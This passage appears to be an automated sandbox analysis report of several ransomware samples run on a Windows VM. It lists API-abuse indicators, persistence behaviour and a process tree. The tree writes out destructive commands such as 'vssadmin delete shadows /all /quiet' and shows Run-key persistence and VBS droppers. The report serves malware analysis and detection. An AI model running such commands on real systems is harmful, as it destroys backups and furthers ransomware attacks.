2444	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeExplorer.EXE

pid	Process
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE

Suspicious use of SetWindowsHookEx 29 IoCs

Processes:

Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.execonhost.execonhost.execonhost.execonhost.exeRegAsm.execonhost.execonhost.exeExplorer.EXEauthupd.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeiexplore.exeIEXPLORE.EXE

pid	Process
1368	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
1436	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
1144	Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
1088	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
2508	conhost.exe
2704	conhost.exe
2900	conhost.exe
1484	conhost.exe
3680	RegAsm.exe
3980	conhost.exe
1160	conhost.exe
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE
5872	authupd.exe
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE
1552	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
4088	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
2992	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
5704	iexplore.exe
5704	iexplore.exe
5760	IEXPLORE.EXE
5760	IEXPLORE.EXE
5760	IEXPLORE.EXE
5760	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe

description	pid	Process	procid_target
PID 1804 wrote to memory of 2412	1804	cmd.exe	36
PID 1804 wrote to memory of 2412	1804	cmd.exe	36
PID 1804 wrote to memory of 2412	1804	cmd.exe	36
PID 1804 wrote to memory of 2412	1804	cmd.exe	36
PID 1804 wrote to memory of 776	1804	cmd.exe	37
PID 1804 wrote to memory of 776	1804	cmd.exe	37
PID 1804 wrote to memory of 776	1804	cmd.exe	37
PID 1804 wrote to memory of 776	1804	cmd.exe	37
PID 1804 wrote to memory of 2000	1804	cmd.exe	38
PID 1804 wrote to memory of 2000	1804	cmd.exe	38
PID 1804 wrote to memory of 2000	1804	cmd.exe	38
PID 1804 wrote to memory of 2000	1804	cmd.exe	38
PID 1804 wrote to memory of 1688	1804	cmd.exe	39
PID 1804 wrote to memory of 1688	1804	cmd.exe	39
PID 1804 wrote to memory of 1688	1804	cmd.exe	39
PID 1804 wrote to memory of 1688	1804	cmd.exe	39
PID 1804 wrote to memory of 628	1804	cmd.exe	40
PID 1804 wrote to memory of 628	1804	cmd.exe	40
PID 1804 wrote to memory of 628	1804	cmd.exe	40
PID 1804 wrote to memory of 628	1804	cmd.exe	40
PID 1804 wrote to memory of 1800	1804	cmd.exe	41
PID 1804 wrote to memory of 1800	1804	cmd.exe	41
PID 1804 wrote to memory of 1800	1804	cmd.exe	41
PID 1804 wrote to memory of 1800	1804	cmd.exe	41
PID 1804 wrote to memory of 1284	1804	cmd.exe	42
PID 1804 wrote to memory of 1284	1804	cmd.exe	42
PID 1804 wrote to memory of 1284	1804	cmd.exe	42
PID 1804 wrote to memory of 1284	1804	cmd.exe	42
PID 1804 wrote to memory of 1164	1804	cmd.exe	43
PID 1804 wrote to memory of 1164	1804	cmd.exe	43
PID 1804 wrote to memory of 1164	1804	cmd.exe	43
PID 1804 wrote to memory of 1164	1804	cmd.exe	43
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1708	1804	cmd.exe	44
PID 1804 wrote to memory of 1088	1804	cmd.exe	45
PID 1804 wrote to memory of 1088	1804	cmd.exe	45
PID 1804 wrote to memory of 1088	1804	cmd.exe	45
PID 1804 wrote to memory of 1088	1804	cmd.exe	45
PID 1804 wrote to memory of 2652	1804	cmd.exe	46
PID 1804 wrote to memory of 2652	1804	cmd.exe	46
PID 1804 wrote to memory of 2652	1804	cmd.exe	46
PID 1804 wrote to memory of 2652	1804	cmd.exe	46
PID 1804 wrote to memory of 1368	1804	cmd.exe	47
PID 1804 wrote to memory of 1368	1804	cmd.exe	47
PID 1804 wrote to memory of 1368	1804	cmd.exe	47
PID 1804 wrote to memory of 1368	1804	cmd.exe	47
PID 1804 wrote to memory of 1056	1804	cmd.exe	48
PID 1804 wrote to memory of 1056	1804	cmd.exe	48
PID 1804 wrote to memory of 1056	1804	cmd.exe	48
PID 1804 wrote to memory of 1056	1804	cmd.exe	48
PID 1804 wrote to memory of 1840	1804	cmd.exe	49
PID 1804 wrote to memory of 1840	1804	cmd.exe	49
PID 1804 wrote to memory of 1840	1804	cmd.exe	49
PID 1804 wrote to memory of 1840	1804	cmd.exe	49
PID 1804 wrote to memory of 2816	1804	cmd.exe	50
PID 1804 wrote to memory of 2816	1804	cmd.exe	50
PID 1804 wrote to memory of 2816	1804	cmd.exe	50
PID 1804 wrote to memory of 2816	1804	cmd.exe	50
PID 1804 wrote to memory of 2776	1804	cmd.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1112
- C:\Windows\System32\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Interacts with shadow copies
  PID:2160
- C:\Windows\System32\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Interacts with shadow copies
  PID:1960

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1184

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1248
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00310.7z"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2316
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
    HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    PID:2412
- - C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
    HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    PID:776
  - - C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
      HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2820
    - - C:\Users\Admin\AppData\Roaming\Wytex\yctik.exe
        
        "C:\Users\Admin\AppData\Roaming\Wytex\yctik.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2996
      - C:\Users\Admin\AppData\Roaming\Wytex\yctik.exe
        
        "C:\Users\Admin\AppData\Roaming\Wytex\yctik.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1760
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_eb335a49.bat"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2036
- - C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
    HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
    HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
  - - C:\Users\Admin\AppData\Roaming\authupd.exe
      "C:\Users\Admin\AppData\Roaming\authupd.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:4700
    - - C:\Users\Admin\AppData\Roaming\authupd.exe
        
        "C:\Users\Admin\AppData\Roaming\authupd.exe"
        5⤵
        Looks for VMWare services registry key.
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Maps connected drives based on registry
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5872
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
    Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:628
  - - C:\ProgramData\IIXguS.exe
      "C:\ProgramData\IIXguS.exe" C:\ProgramData\IIXguS.au3
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:496
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /release *
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:3596
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
        5⤵
        Looks for VMWare services registry key.
        Checks whether UAC is enabled
        Maps connected drives based on registry
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3680
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /renew *
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:5048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1324
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:4824
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:7088
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6676
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1780
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:2028
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2692
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6660
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4604
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7164
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2704
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7016
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3476
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2004
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2324
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:4140
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:4908
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6344
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:4872
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:2020
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6836
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5396
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:4308
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5244
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:1748
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6264
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5432
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5256
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5016
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:1412
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:1260
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:344
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3552
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6740
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:2544
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:3364
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6092
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:2172
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3468
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:4852
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5140
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6000
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6476
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3900
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:3708
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:4552
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:1620
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6464
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6556
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3936
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6468
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6784
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5856
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5164
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6944
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5376
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:568
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3336
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6320
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:6332
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:3164
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:636
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3496
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:2876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:2280
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:6948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3828
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5864
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:4676
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:3684
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:3372
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:5028
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        6⤵
        
        PID:5512
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:1348
      - C:\Windows\SysWOW64\WScript.exe
        
